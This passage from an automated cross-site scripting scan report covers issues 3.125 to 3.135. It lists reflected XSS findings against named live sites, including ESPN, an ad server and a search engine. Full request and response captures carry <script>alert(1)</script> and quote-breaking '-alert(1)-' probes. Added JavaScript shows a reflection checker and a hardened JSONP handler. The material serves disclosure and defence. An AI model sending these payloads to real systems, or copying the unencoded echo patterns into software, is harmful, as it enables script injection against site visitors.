X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=463861018; t=1303228691012; suggestedSlashtagsList=1; v=3; fbl=2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Apr 2011 16:00:52 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Wed, 20 Apr 2011 04:00:52 GMT
Vary: Accept-Encoding
Content-Length: 71
X-Blekko-PT: 4795d055b6321d27f2aa13aa24f30218

{"suggestions":[],"query":"ze866e<script>alert(1)</script>3984cec7a15"}
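Added example, not part of the XSS.CX report: a reduced form of the check the scanner applies in issues 3.123 to 3.125. The canary (random prefix, probe, random suffix) is located in the response body, the echoed segment is compared with what was sent, and the markup preceding it decides which character has to survive unencoded for the probe to leave its context. The response bodies are copied from the captures above; the "fixed" mookie1 body is constructed and hypothetical, showing what the same handler would return if it HTML-encoded the path segment. Function and field names are this example's own.

```javascript
// Added example (not from the XSS.CX report): the reflection check the
// scanner applies, reduced to its essentials.

// Response bodies copied from the captures in issues 3.123 and 3.125.
// mookie1Fixed is constructed and hypothetical: what the same handler would
// return if it HTML-encoded the path segment before placing it in HREF.
const RESPONSES = {
  mookie1: {
    contentType: 'text/html',
    body: '<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314"><script>alert(1)</script>d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38/503112095/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">',
  },
  mookie1Fixed: {
    contentType: 'text/html',
    body: '<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt/All6c314&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;d3932d3a3a7/1b5458553-7549-414b-83d2-2100a7556d38/503112095/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">',
  },
  blekko: {
    contentType: 'text/plain; charset=utf-8',
    body: '{"suggestions":[],"query":"ze866e<script>alert(1)</script>3984cec7a15"}',
  },
};

// Canaries as submitted: random prefix, the probe, random suffix.
const CANARIES = {
  mookie1: { prefix: '6c314', probe: '"><script>alert(1)</script>', suffix: 'd3932d3a3a7' },
  blekko: { prefix: 'e866e', probe: '<script>alert(1)</script>', suffix: '3984cec7a15' },
};

// Decide what surrounds position idx: text between tags, inside a tag with an
// open double- or single-quoted attribute, or inside a tag unquoted.
function classifyContext(body, idx) {
  const before = body.slice(0, idx);
  const lastLt = before.lastIndexOf('<');
  const lastGt = before.lastIndexOf('>');
  if (lastLt <= lastGt) return 'text';
  const tag = before.slice(lastLt);
  const dq = (tag.match(/"/g) || []).length;
  const sq = (tag.match(/'/g) || []).length;
  if (dq % 2 === 1) return 'attribute-dq';
  if (sq % 2 === 1) return 'attribute-sq';
  return 'tag';
}

// The character that must survive unencoded for the probe to leave the context.
const BREAKOUT = { text: '<', 'attribute-dq': '"', 'attribute-sq': "'", tag: '>' };

function checkReflection(response, canary) {
  const { body, contentType } = response;
  const start = body.indexOf(canary.prefix);
  if (start < 0) return { reflected: false };
  const from = start + canary.prefix.length;
  const end = body.indexOf(canary.suffix, from);
  if (end < 0) return { reflected: false };
  const echoed = body.slice(from, end);
  const context = classifyContext(body, start);
  return {
    reflected: true,
    context,
    echoed,
    unmodified: echoed === canary.probe,
    breakout: echoed.includes(BREAKOUT[context]),
    rendersAsHtml: /^text\/html\b/i.test(contentType),
  };
}

// Runs the three bodies and marks which reflections are exploitable as-is:
// the breakout character survived AND the browser will render the body as HTML.
function runAll() {
  const out = {
    mookie1: checkReflection(RESPONSES.mookie1, CANARIES.mookie1),
    mookie1Fixed: checkReflection(RESPONSES.mookie1Fixed, CANARIES.mookie1),
    blekko: checkReflection(RESPONSES.blekko, CANARIES.blekko),
  };
  for (const [name, r] of Object.entries(out)) {
    r.exploitable = Boolean(r.reflected && r.breakout && r.rendersAsHtml);
    console.log(name, r.context, 'unmodified=' + r.unmodified, 'exploitable=' + r.exploitable);
  }
  return out;
}

runAll();
```

The blekko result is reported as unmodified with the breakout character intact but not exploitable, because the declared type is text/plain; that distinction is what separates a missing-encoding finding from a reflected XSS that a link alone can trigger.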

3.126. http://broadband.espn.go.com/espn3/auth/espnnetworks/user [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://broadband.espn.go.com
Path:   /espn3/auth/espnnetworks/user

Issue detail

The value of the callback request parameter is copied unencoded to the start of the response body as the JSONP callback name. The payload 4d851<script>alert(1)</script>bb63329db8 was submitted in the callback parameter. This input was echoed unmodified in the application's response. Because the response is served as text/html; charset=iso-8859-1 rather than as JavaScript, a browser navigated directly to this URL renders the reflected payload as HTML and executes the script; no including page is required.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /espn3/auth/espnnetworks/user?callback=jsonp12984973704964d851<script>alert(1)</script>bb63329db8 HTTP/1.1
Host: broadband.espn.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; userAB=F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 104
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-09/10

jsonp12984973704964d851<script>alert(1)</script>bb63329db8(
{ "espn3":"invalid", "networks":"invalid" })
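Added example, not ESPN's code: the JSONP endpoint of issue 3.126 as captured (callback echoed verbatim, result labelled text/html) beside a hardened version that restricts the callback to an identifier path, serves the body as JavaScript with X-Content-Type-Options: nosniff, and answers anything else with a 400 instead of echoing it. A plain-JSON variant covers the blekko shape from issue 3.125. The function names, the 64-character cap and the response object shape are assumptions of this example.

```javascript
// Added example (not ESPN's code): the JSONP endpoint of issue 3.126 as
// captured, beside a hardened version.

// Body of the captured response.
const STATUS = { espn3: 'invalid', networks: 'invalid' };

// As captured: the callback is echoed verbatim and the result is labelled
// text/html, so a browser navigated to the URL renders the reflection as markup.
function jsonpVulnerable(callback) {
  return {
    status: 200,
    headers: { 'Content-Type': 'text/html; charset=iso-8859-1' },
    body: callback + '(\n' + JSON.stringify(STATUS) + ')',
  };
}

// Hardened. Assumed policy: the callback must be an identifier path such as
// jsonp1298497370496 or window.cb, at most 64 characters; anything else gets a
// 400 rather than a silent fallback. The body is declared as JavaScript with
// nosniff and starts with a comment so the leading bytes are never attacker
// chosen.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK = 64;

function validCallback(callback) {
  return typeof callback === 'string' && callback.length <= MAX_CALLBACK && CALLBACK_RE.test(callback);
}

function jsonpHardened(callback) {
  if (!validCallback(callback)) {
    return {
      status: 400,
      headers: { 'Content-Type': 'text/plain; charset=utf-8', 'X-Content-Type-Options': 'nosniff' },
      body: 'invalid callback',
    };
  }
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript; charset=utf-8', 'X-Content-Type-Options': 'nosniff' },
    body: '/**/' + callback + '(' + JSON.stringify(STATUS) + ');',
  };
}

// Plain JSON (the blekko shape in issue 3.125): no callback at all, declared
// as JSON and marked nosniff so the body is never rendered as HTML even when
// it contains user input verbatim.
function jsonResponse(payload) {
  return {
    status: 200,
    headers: { 'Content-Type': 'application/json; charset=utf-8', 'X-Content-Type-Options': 'nosniff' },
    body: JSON.stringify(payload),
  };
}

// The callback value from the capture above.
const PAYLOAD = 'jsonp12984973704964d851<script>alert(1)</script>bb63329db8';
console.log(jsonpVulnerable(PAYLOAD).body);
console.log(jsonpHardened(PAYLOAD).status, jsonpHardened('jsonp1298497370496').body);
console.log(jsonResponse({ suggestions: [], query: 'z<script>alert(1)</script>' }).headers);
```

The validation regex is the actual fix; the content type and nosniff header are defence in depth, so that a future bug in the validation cannot be turned back into an HTML injection by a browser sniffing the body.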

3.127. http://core.insightexpressai.com/adServer/GetInvite2.aspx [adexpansion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the adexpansion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ff3f'-alert(1)-'389354f97e7 was submitted in the adexpansion parameter. This input was echoed unmodified in the application's response. The response shows that the entire raw query string, not only this parameter, is assigned to InsightExpress.QueryString, which is why every parameter name and value on this endpoint reflects in the same way (issues 3.127 to 3.133). Because the response is served as text/javascript, the injected code does not run when this URL is opened directly in a browser; it executes in the origin of any page that loads the URL in a <script> element, which is how the publisher-side tag at /adServer/adServerESI.aspx (issue 3.135) includes it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=05ff3f'-alert(1)-'389354f97e7&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:19 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
TimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=05ff3f'-alert(1)-'389354f97e7&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.P
...[SNIP]...

3.128. http://core.insightexpressai.com/adServer/GetInvite2.aspx [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b9b'-alert(1)-'f3000b47a8f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=012b9b'-alert(1)-'f3000b47a8f&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:29 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
'/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=012b9b'-alert(1)-'f3000b47a8f&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"
...[SNIP]...

3.129. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the creativeID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6c1'-alert(1)-'5041316b77e was submitted in the creativeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=14679689e6c1'-alert(1)-'5041316b77e HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:33 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
tExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=14679689e6c1'-alert(1)-'5041316b77e'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Type"
...[SNIP]...

3.130. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the esi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdda0'-alert(1)-'db54780fa93 was submitted in the esi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=truefdda0'-alert(1)-'db54780fa93&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:09 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
cs.AddParam('timeinview',InsightExpress.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=truefdda0'-alert(1)-'db54780fa93&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Co
...[SNIP]...

3.131. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdcad'-alert(1)-'45ed1dc4170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968&bdcad'-alert(1)-'45ed1dc4170=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19931
Date: Thu, 21 Apr 2011 01:57:38 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
Express.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968&bdcad'-alert(1)-'45ed1dc4170=1'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Typ
...[SNIP]...

3.132. http://core.insightexpressai.com/adServer/GetInvite2.aspx [placementID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the placementID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1f0b'-alert(1)-'e0b38926cbb was submitted in the placementID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525c1f0b'-alert(1)-'e0b38926cbb&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:26 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ss.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525c1f0b'-alert(1)-'e0b38926cbb&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard"
...[SNIP]...

3.133. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the referer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c18'-alert(1)-'24d5fcbf7c9 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.comf5c18'-alert(1)-'24d5fcbf7c9&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19946
Date: Thu, 21 Apr 2011 01:57:15 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
nalytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.comf5c18'-alert(1)-'24d5fcbf7c9&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new In
...[SNIP]...

3.134. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f43b9'-alert(1)-'33e1490a324 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcomf43b9'-alert(1)-'33e1490a324&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19918
Date: Thu, 21 Apr 2011 01:57:22 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcomf43b9'-alert(1)-'33e1490a324&placementID=1248525&click=0&creativeID=1467968'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Di
...[SNIP]...

3.135. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]

Summary

